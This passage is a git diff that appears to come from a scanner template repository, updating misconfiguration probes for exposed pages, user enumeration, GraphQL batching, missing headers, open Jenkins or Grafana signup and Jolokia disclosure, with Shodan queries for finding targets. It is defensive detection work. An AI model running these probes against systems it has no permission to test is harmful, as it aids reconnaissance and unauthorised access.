+  tags: exposure,corebos,huntr,misconfig
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/htaccess.txt'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Options -Indexes'
+          - '<FilesMatch'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/cx-cloud-upload-detect.yaml b/misconfiguration/cx-cloud-upload-detect.yaml
index 0c48de1457..57ddcab759 100644
--- a/misconfiguration/cx-cloud-upload-detect.yaml
+++ b/misconfiguration/cx-cloud-upload-detect.yaml
@@ -4,7 +4,7 @@ info:
   name: CX Cloud Unauthenticated Upload Detect
   author: dhiyaneshDk
   severity: info
-  tags: upload
+  tags: fileupload
 
 requests:
   - method: GET
diff --git a/misconfiguration/d-link-arbitary-fileread.yaml b/misconfiguration/d-link-arbitary-fileread.yaml
index 453ed0fb23..748e274986 100644
--- a/misconfiguration/d-link-arbitary-fileread.yaml
+++ b/misconfiguration/d-link-arbitary-fileread.yaml
@@ -1,11 +1,16 @@
 id: dlink-file-read
 
 info:
-  name: D-Link - Arbitrary File Retrieval
+  name: D-Link - Local File Inclusion
   author: dhiyaneshDK
   severity: high
+  description: D-Link is vulnerable to local file inclusion.
   reference:
     - https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
   tags: dlink,lfi
 
 requests:
@@ -25,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/misconfiguration/database-error.yaml b/misconfiguration/database-error.yaml
index 13a6ee0488..3b90a1aa5b 100644
--- a/misconfiguration/database-error.yaml
+++ b/misconfiguration/database-error.yaml
@@ -4,8 +4,8 @@ info:
   name: Database Error
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Database+Error%22
+  metadata:
+    shodan-query: http.title:"Database Error"
   tags: misconfig,database
 
 requests:
diff --git a/misconfiguration/drupal/drupal-user-enum-ajax.yaml b/misconfiguration/drupal/drupal-user-enum-ajax.yaml
index 99667e96a3..51742e5152 100644
--- a/misconfiguration/drupal/drupal-user-enum-ajax.yaml
+++ b/misconfiguration/drupal/drupal-user-enum-ajax.yaml
@@ -4,6 +4,8 @@ info:
   name: Drupal User Enumration [Ajax]
   author: 0w4ys
   severity: info
+  metadata:
+    shodan-query: http.component:"drupal"
   tags: drupal
 
 requests:
diff --git a/misconfiguration/drupal/drupal-user-enum-redirect.yaml b/misconfiguration/drupal/drupal-user-enum-redirect.yaml
index d004bb85be..b39697d6c0 100644
--- a/misconfiguration/drupal/drupal-user-enum-redirect.yaml
+++ b/misconfiguration/drupal/drupal-user-enum-redirect.yaml
@@ -1,10 +1,13 @@
 id: drupal-user-enum-redirect
 
 info:
-  name: Drupal User Enumration [Redirect]
+  name: Drupal User Enumeration [Redirect]
   author: 0w4ys
   severity: info
-  tags: drupal
+  metadata:
+    verified: true
+    shodan-query: http.component:"Drupal"
+  tags: drupal,misconfig
 
 requests:
   - method: GET
@@ -19,7 +22,7 @@ requests:
     matchers:
       - type: regex
         regex:
-          - '(?i)Location: http(s|):\/\/[\w\.\-]+(\/ar|\/en|)\/users\/\w+'
+          - '(?i)Location: https?:\/\/[\w\.\-]+[:\/\w-]*\/users\/\w+'
         part: header
 
       - type: status
diff --git a/misconfiguration/ec2-instance-information.yaml b/misconfiguration/ec2-instance-information.yaml
new file mode 100644
index 0000000000..c9ee3585a6
--- /dev/null
+++ b/misconfiguration/ec2-instance-information.yaml
@@ -0,0 +1,33 @@
+id: ec2-instance-information
+
+info:
+  name: EC2 Instance Information
+  author: DhiyaneshDk
+  severity: low
+  reference:
+    - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5567070616690100/
+  metadata:
+    verified: true
+    shodan-query: title:"EC2 Instance Information"
+  tags: misconfig,ec2,aws,amazon
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>EC2 Instance Information</title>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/etcd-unauthenticated-api.yaml b/misconfiguration/etcd-unauthenticated-api.yaml
index 6c7382e809..f4262e3ba9 100644
--- a/misconfiguration/etcd-unauthenticated-api.yaml
+++ b/misconfiguration/etcd-unauthenticated-api.yaml
@@ -6,7 +6,7 @@ info:
   severity: high
   reference:
     - https://hackerone.com/reports/1088429
-  tags: unauth
+  tags: hackerone,unauth
 
 requests:
   - method: GET
diff --git a/misconfiguration/exposed-jquery-file-upload.yaml b/misconfiguration/exposed-jquery-file-upload.yaml
index 7078c4b70a..3fd6eef982 100644
--- a/misconfiguration/exposed-jquery-file-upload.yaml
+++ b/misconfiguration/exposed-jquery-file-upload.yaml
@@ -6,7 +6,7 @@ info:
   severity: medium
   reference:
     - https://www.exploit-db.com/exploits/45584
-  tags: exposure,jquery
+  tags: exposure,jquery,edb
 
 requests:
   - method: GET
diff --git a/misconfiguration/exposed-sqlite-manager.yaml b/misconfiguration/exposed-sqlite-manager.yaml
index 6a86dc4ca9..6a6622a845 100644
--- a/misconfiguration/exposed-sqlite-manager.yaml
+++ b/misconfiguration/exposed-sqlite-manager.yaml
@@ -6,7 +6,7 @@ info:
   severity: medium
   reference:
     - https://www.exploit-db.com/ghdb/5003
-  tags: sqlite
+  tags: sqlite,edb
 
 requests:
   - method: GET
diff --git a/misconfiguration/grafana-public-signup.yaml b/misconfiguration/grafana-public-signup.yaml
index 0d88970cf3..e33981e188 100644
--- a/misconfiguration/grafana-public-signup.yaml
+++ b/misconfiguration/grafana-public-signup.yaml
@@ -4,6 +4,8 @@ info:
   name: Grafana Public Signup
   author: pdteam
   severity: medium
+  metadata:
+    shodan-query: title:"Grafana"
   tags: grafana,intrusive
 
 requests:
@@ -15,7 +17,7 @@ requests:
         Origin: {{BaseURL}}
         Referer: {{BaseURL}}
 
-        {"username":"nuclei_{{randstr}}","password":"{{randstr_1}}"}
+        {"username":"{{randstr}}","password":"{{randstr_1}}"}
 
     matchers-condition: and
     matchers:
diff --git a/misconfiguration/graphql/graphql-alias-batching.yaml b/misconfiguration/graphql/graphql-alias-batching.yaml
index eec26f56fa..2852440c5d 100644
--- a/misconfiguration/graphql/graphql-alias-batching.yaml
+++ b/misconfiguration/graphql/graphql-alias-batching.yaml
@@ -3,7 +3,7 @@ id: graphql-alias-batching
 info:
   name: GraphQL Alias-based Batching
   author: Dolev Farhi
-  severity: low
+  severity: info
   description: |
     GraphQL supports aliasing of multiple sub-queries into a single queries. This allows users to request multiple objects or multiple instances of objects efficiently.
     However, an attacker can leverage this feature to evade many security measures, including rate limit.
@@ -25,6 +25,14 @@ requests:
 
         {"query":"query {\n nuclei1:__typename \n nuclei2:__typename \n nuclei3:__typename \n nuclei4:__typename \n nuclei5:__typename \n nuclei6:__typename \n }"}
 
+      - |
+        POST /api/graphql HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"query":"query {\n nuclei1:__typename \n nuclei2:__typename \n nuclei3:__typename \n nuclei4:__typename \n nuclei5:__typename \n nuclei6:__typename \n }"}
+
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
@@ -38,4 +46,4 @@ requests:
       - type: word
         part: header
         words:
-          - "application/json"
\ No newline at end of file
+          - "application/json"
diff --git a/misconfiguration/graphql/graphql-array-batching.yaml b/misconfiguration/graphql/graphql-array-batching.yaml
index be4e76b5a3..e517f93360 100644
--- a/misconfiguration/graphql/graphql-array-batching.yaml
+++ b/misconfiguration/graphql/graphql-array-batching.yaml
@@ -3,7 +3,7 @@ id: graphql-array-batching
 info:
   name: GraphQL Array-based Batching
   author: Dolev Farhi
-  severity: low
+  severity: info
   description: |
     Some GraphQL engines support batching of multiple queries into a single request. This allows users to request multiple objects or multiple instances of objects efficiently.
     However, an attacker can leverage this feature to evade many security measures, including Rate Limit.
@@ -24,6 +24,14 @@ requests:
 
         [{"query":"query {\n __typename \n }"}, {"query":"mutation { \n __typename \n }"}]
 
+      - |
+        POST /api/graphql HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        [{"query":"query {\n __typename \n }"}, {"query":"mutation { \n __typename \n }"}]
+
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
@@ -37,4 +45,4 @@ requests:
       - type: word
         part: header
         words:
-          - "application/json"
\ No newline at end of file
+          - "application/json"
diff --git a/misconfiguration/graphql/graphql-field-suggestion.yaml b/misconfiguration/graphql/graphql-field-suggestion.yaml
index 543825ebe8..f46c89ada2 100644
--- a/misconfiguration/graphql/graphql-field-suggestion.yaml
+++ b/misconfiguration/graphql/graphql-field-suggestion.yaml
@@ -24,6 +24,14 @@ requests:
 
         {"query":"query {\n  __schema {\n directive\n }\n}","variables":null}
 
+      - |
+        POST /api/graphql HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"query":"query {\n  __schema {\n directive\n }\n}","variables":null}
+
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
@@ -34,4 +42,4 @@ requests:
       - type: word
         part: header
         words:
-          - "application/json"
\ No newline at end of file
+          - "application/json"
diff --git a/misconfiguration/graphql/graphql-get-method.yaml b/misconfiguration/graphql/graphql-get-method.yaml
index d83c13f8b5..f7e2859ca7 100644
--- a/misconfiguration/graphql/graphql-get-method.yaml
+++ b/misconfiguration/graphql/graphql-get-method.yaml
@@ -18,7 +18,9 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/graphql?query={__typename}"
+      - "{{BaseURL}}/api/graphql?query={__typename}"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
@@ -33,4 +35,4 @@ requests:
       - type: word
         part: header
         words:
-          - "application/json"
\ No newline at end of file
+          - "application/json"
diff --git a/misconfiguration/graphql/graphql-playground.yaml b/misconfiguration/graphql/graphql-playground.yaml
new file mode 100644
index 0000000000..3b30d130a5
--- /dev/null
+++ b/misconfiguration/graphql/graphql-playground.yaml
@@ -0,0 +1,33 @@
+id: graphql-playground
+
+info:
+  name: GraphQL Playground
+  author: DhiyaneshDk
+  severity: unknown
+  reference:
+    - https://github.com/graphql/graphql-playground
+  metadata:
+    verified: true
+    shodan-query: title:"GraphQL Playground"
+  tags: misconfig,graphql
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>GraphQL playground</title>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/haproxy-status.yaml b/misconfiguration/haproxy-status.yaml
index 39b94a76a0..8b1e87464f 100644
--- a/misconfiguration/haproxy-status.yaml
+++ b/misconfiguration/haproxy-status.yaml
@@ -6,12 +6,13 @@ info:
   severity: medium
   reference:
     - https://www.exploit-db.com/ghdb/4191
-  tags: logs,haproxy
+  tags: logs,haproxy,edb
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/haproxy-status"
+      - "{{BaseURL}}/haproxy?stats"
 
     matchers-condition: and
     matchers:
diff --git a/misconfiguration/hivequeue-agent.yaml b/misconfiguration/hivequeue-agent.yaml
new file mode 100644
index 0000000000..f0b71b627e
--- /dev/null
+++ b/misconfiguration/hivequeue-agent.yaml
@@ -0,0 +1,33 @@
+id: hivequeue-agent
+
+info:
+  name: HiveQueue Agent
+  author: DhiyaneshDk
+  severity: low
+  reference:
+    - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5555061814557647/
+  metadata:
+    verified: true
+    shodan-query: http.title:"HiveQueue"
+  tags: misconfig,hivequeue
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/monitoring"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>HiveQueue Agent</title>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/unauthorized-hp-printer.yaml b/misconfiguration/hp/unauthorized-hp-printer.yaml
similarity index 94%
rename from misconfiguration/unauthorized-hp-printer.yaml
rename to misconfiguration/hp/unauthorized-hp-printer.yaml
index f3974b8ffe..adf7d2e653 100644
--- a/misconfiguration/unauthorized-hp-printer.yaml
+++ b/misconfiguration/hp/unauthorized-hp-printer.yaml
@@ -1,24 +1,24 @@
-id: unauthorized-hp-printer
+id: unauthorized-hp-printer
 
-info:
-  name: Unauthorized HP Printer
-  author: pussycat0x
-  severity: high
-  tags: hp,iot,unauth
+info:
+  name: Unauthorized HP Printer
+  author: pussycat0x
+  severity: high
+  tags: hp,iot,unauth
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/SSI/Auth/ip_snmp.htm"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "HP"
-          - "<h1>SNMP</h1>"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/SSI/Auth/ip_snmp.htm"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "HP"
+          - "<h1>SNMP</h1>"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/hp/unauthorized-hp-officepro-printer.yaml b/misconfiguration/hp/unauthorized-printer-hp.yaml
similarity index 60%
rename from misconfiguration/hp/unauthorized-hp-officepro-printer.yaml
rename to misconfiguration/hp/unauthorized-printer-hp.yaml
index 75df2eacb7..a04c2f3be0 100644
--- a/misconfiguration/hp/unauthorized-hp-officepro-printer.yaml
+++ b/misconfiguration/hp/unauthorized-printer-hp.yaml
@@ -1,24 +1,25 @@
-id: unauthorized-hp-officepro-printer
+id: unauthorized-printer-hp
 
-info:
-  name: Unauthorized HP office pro printer
-  author: pussycat0x
-  severity: high
-  metadata:
-    shodan-dork: http.title:"Hp Officejet pro"
-  tags: hp,iot,unauth
+info:
+  name: Unauthorized HP office pro printer
+  author: pussycat0x,r3naissance
+  severity: high
+  metadata:
+    shodan-dork: http.title:"Hp Officejet pro"
+  tags: hp,iot,unauth
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - '<title>HP Officejet Pro([ 0-9A-Za-z]+)<\/title>'
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/hp/device/webAccess/index.htm?content=security"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '<title>(HP Officejet Pro([ 0-9A-Za-z]+)|HP Designjet([ 0-9A-Za-z]+).*)<\/title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/hpe-system-management-anonymous.yaml b/misconfiguration/hpe-system-management-anonymous.yaml
index 7239ec4921..d7832e0f4b 100644
--- a/misconfiguration/hpe-system-management-anonymous.yaml
+++ b/misconfiguration/hpe-system-management-anonymous.yaml
@@ -1,21 +1,21 @@
-id: hpe-system-management-anonymous-access
+id: hpe-system-management-anonymous-access
 
-info:
-  name: HPE System Management Anonymous Access
-  author: divya_mudgal
-  severity: low
-  tags: hp,unauth
+info:
+  name: HPE System Management Anonymous Access
+  author: divya_mudgal
+  severity: low
+  tags: hp,unauth
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/chpstrt.php?chppath=Home"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        condition: and
-        words:
-          - "username = \"hpsmh_anonymous\";"
-          - "var host_addr = '"
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/chpstrt.php?chppath=Home"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        condition: and
+        words:
+          - "username = \"hpsmh_anonymous\";"
+          - "var host_addr = '"
           - "var ip_addr   = '"
\ No newline at end of file
diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml
index 1db54f9e22..ec6e6003ca 100644
--- a/misconfiguration/http-missing-security-headers.yaml
+++ b/misconfiguration/http-missing-security-headers.yaml
@@ -2,9 +2,10 @@ id: http-missing-security-headers
 
 info:
   name: HTTP Missing Security Headers
-  author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki
+  author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki,forgedhallpass
   severity: info
-  description: It searches for missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty.
+  description: |
+    This template searches for missing HTTP security headers. The impact of these missing headers can vary.
   tags: misconfig,generic
 
 requests:
@@ -16,119 +17,121 @@ requests:
     max-redirects: 3
     matchers-condition: or
     matchers:
-      - type: regex
+      - type: dsl
         name: strict-transport-security
-        regex:
-          - "(?i)strict-transport-security"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)strict-transport-security', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: content-security-policy
-        regex:
-          - "(?i)content-security-policy"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)content-security-policy', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: permission-policy
-        regex:
-          - "(?i)permission-policy"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)permission-policy', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: x-frame-options
-        regex:
-          - "(?i)x-frame-options"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)x-frame-options', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: x-content-type-options
-        regex:
-          - "(?i)x-content-type-options"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)x-content-type-options', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: x-permitted-cross-domain-policies
-        regex:
-          - "(?i)x-permitted-cross-domain-policies"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)x-permitted-cross-domain-policies', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: referrer-policy
-        regex:
-          - "(?i)referrer-policy"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)referrer-policy', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: clear-site-data
-        regex:
-          - "(?i)clear-site-data"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)clear-site-data', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: cross-origin-embedder-policy
-        regex:
-          - "(?i)cross-origin-embedder-policy"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)cross-origin-embedder-policy', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: cross-origin-opener-policy
-        regex:
-          - "(?i)cross-origin-opener-policy"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)cross-origin-opener-policy', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: cross-origin-resource-policy
-        regex:
-          - "(?i)cross-origin-resource-policy"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)cross-origin-resource-policy', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: access-control-allow-origin
-        regex:
-          - "(?i)access-control-allow-origin"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)access-control-allow-origin', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: access-control-allow-credentials
-        regex:
-          - "(?i)access-control-allow-credentials"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)access-control-allow-credentials', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: access-control-expose-headers
-        regex:
-          - "(?i)access-control-expose-headers"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)access-control-expose-headers', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: access-control-max-age
-        regex:
-          - "(?i)access-control-max-age"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)access-control-max-age', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: access-control-allow-methods
-        regex:
-          - "(?i)access-control-allow-methods"
-        negative: true
-        part: header
+        dsl:
+          - "!regex('(?i)access-control-allow-methods', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
 
-      - type: regex
+      - type: dsl
         name: access-control-allow-headers
-        regex:
-          - "(?i)access-control-allow-headers"
+        dsl:
+          - "!regex('(?i)access-control-allow-headers', all_headers)"
+          - "status_code != 301 && status_code != 302"
+        condition: and
diff --git a/misconfiguration/ibm-friendly-path-exposure.yaml b/misconfiguration/ibm-friendly-path-exposure.yaml
index 6eaba55a85..139826d23b 100644
--- a/misconfiguration/ibm-friendly-path-exposure.yaml
+++ b/misconfiguration/ibm-friendly-path-exposure.yaml
@@ -7,6 +7,8 @@ info:
   description: Finds friendly path exposed that can be used to access signup page and create new user accounts.
   reference:
     - https://clarkvoss.medium.com/how-to-harpon-big-blue-c163722638d8
+  metadata:
+    shodan-query: http.html:"IBM WebSphere Portal"
   tags: ibm,exposure,websphere
 
 requests:
diff --git a/misconfiguration/iis-internal-ip-disclosure.yaml b/misconfiguration/iis-internal-ip-disclosure.yaml
index cf7013d349..3885b77a1d 100644
--- a/misconfiguration/iis-internal-ip-disclosure.yaml
+++ b/misconfiguration/iis-internal-ip-disclosure.yaml
@@ -10,25 +10,31 @@ info:
 
 requests:
   - raw:
+      - |+
+        GET / HTTP/1.0
+        Accept: */*
+
       - |+
         GET / HTTP/1.0
         Host:
         Accept: */*
 
+    stop-at-first-match: true
     unsafe: true # Use Unsafe HTTP library for malformed HTTP requests.
     matchers-condition: and
     matchers:
       - type: regex
-        part: header
+        part: location
         regex:
           - '([0-9]{1,3}[\.]){3}[0-9]{1,3}'
 
       - type: status
         status:
+          - 301
           - 302
 
     extractors:
       - type: regex
-        part: header
+        part: location
         regex:
           - '([0-9]{1,3}[\.]){3}[0-9]{1,3}'
\ No newline at end of file
diff --git a/misconfiguration/jboss-status.yaml b/misconfiguration/jboss-status.yaml
index db0b84522a..8c6dd4ac44 100644
--- a/misconfiguration/jboss-status.yaml
+++ b/misconfiguration/jboss-status.yaml
@@ -6,7 +6,7 @@ info:
   severity: low
   reference:
     - https://www.exploit-db.com/ghdb/5215
-  tags: jboss,unauth
+  tags: jboss,unauth,edb
 
 requests:
   - method: GET
diff --git a/misconfiguration/jenkins/jenkins-openuser-register.yaml b/misconfiguration/jenkins/jenkins-openuser-register.yaml
new file mode 100644
index 0000000000..dfc0483289
--- /dev/null
+++ b/misconfiguration/jenkins/jenkins-openuser-register.yaml
@@ -0,0 +1,35 @@
+id: jenkins-openuser-register
+
+info:
+  name: Jenkins Open User registration
+  author: DhiyaneshDk
+  severity: medium
+  description: The Jenkins allows registering a new user and accessing the dashboard.
+  remediation: Its recommended to turn off user registration.
+  reference:
+    - https://www.acunetix.com/vulnerabilities/web/jenkins-open-user-registration/
+  metadata:
+    verified: true
+    shodan-query: "X-Jenkins"
+  tags: misconfig,jenkins,apache,tomcat
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/signup"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Create an account! [Jenkins]"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/jolokia/jolokia-info-disclosure.yaml b/misconfiguration/jolokia/jolokia-info-disclosure.yaml
index e0de02da32..27a090c5b7 100644
--- a/misconfiguration/jolokia/jolokia-info-disclosure.yaml
+++ b/misconfiguration/jolokia/jolokia-info-disclosure.yaml
@@ -1,71 +1,72 @@
-id: jolokia-info-disclosure
-info:
-  name: Jolokia - Information disclosure
-  author: pussycat0x
-  severity: medium
-  reference:
-    - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
-    - https://github.com/laluka/jolokia-exploitation-toolkit
-  tags: jolokia,springboot,mbean,tomcat
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
-      - "{{BaseURL}}/actuator/jolokia/read/java.lang:type=Memory"
-      - "{{BaseURL}}/jolokia/read/java.lang:type=Memory"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
-
-    matchers-condition: or
-    matchers:
-      - type: word
-        name: memory
-        words:
-          - '"mbean":"java.lang:type=Memory"'
-
-      - type: word
-        name: implementation-vendor
-        words:
-          - '"attribute":"ImplementationVendor"'
-
-      - type: word
-        name: implementation-version
-        words:
-          - '"attribute":"ImplementationVersion"'
-
-      - type: word
-        name: implementation-name
-        words:
-          - '"attribute":"ImplementationName"'
-
-      - type: word
-        name: specification-vendor
-        words:
-          - '"attribute":"SpecificationVendor"'
-
-      - type: word
-        name: mbean-serverid
-        words:
-          - '"attribute":"MBeanServerId"'
-
-      - type: word
-        name: specification-name
-        words:
-          - '"attribute":"SpecificationName"'
-
-      - type: word
-        name: specification-version
-        words:
-          - '"attribute":"SpecificationVersion'
+id: jolokia-info-disclosure
+
+info:
+  name: Jolokia - Information disclosure
+  author: pussycat0x
+  severity: medium
+  reference:
+    - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
+    - https://github.com/laluka/jolokia-exploitation-toolkit
+  tags: jolokia,springboot,mbean,tomcat
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
+      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
+      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
+      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
+      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
+      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
+      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
+      - "{{BaseURL}}/actuator/jolokia/read/java.lang:type=Memory"
+      - "{{BaseURL}}/jolokia/read/java.lang:type=Memory"
+      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
+      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
+      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
+      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
+      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
+      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
+      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        name: memory
+        words:
+          - '"mbean":"java.lang:type=Memory"'
+
+      - type: word
+        name: implementation-vendor
+        words:
+          - '"attribute":"ImplementationVendor"'
+
+      - type: word
+        name: implementation-version
+        words:
+          - '"attribute":"ImplementationVersion"'
+
+      - type: word
+        name: implementation-name
+        words:
+          - '"attribute":"ImplementationName"'
+
+      - type: word
+        name: specification-vendor
+        words:
+          - '"attribute":"SpecificationVendor"'
+
+      - type: word
+        name: mbean-serverid
+        words:
+          - '"attribute":"MBeanServerId"'
+
+      - type: word
+        name: specification-name
+        words:
+          - '"attribute":"SpecificationName"'
+
+      - type: word
+        name: specification-version
+        words:
+          - '"attribute":"SpecificationVersion'
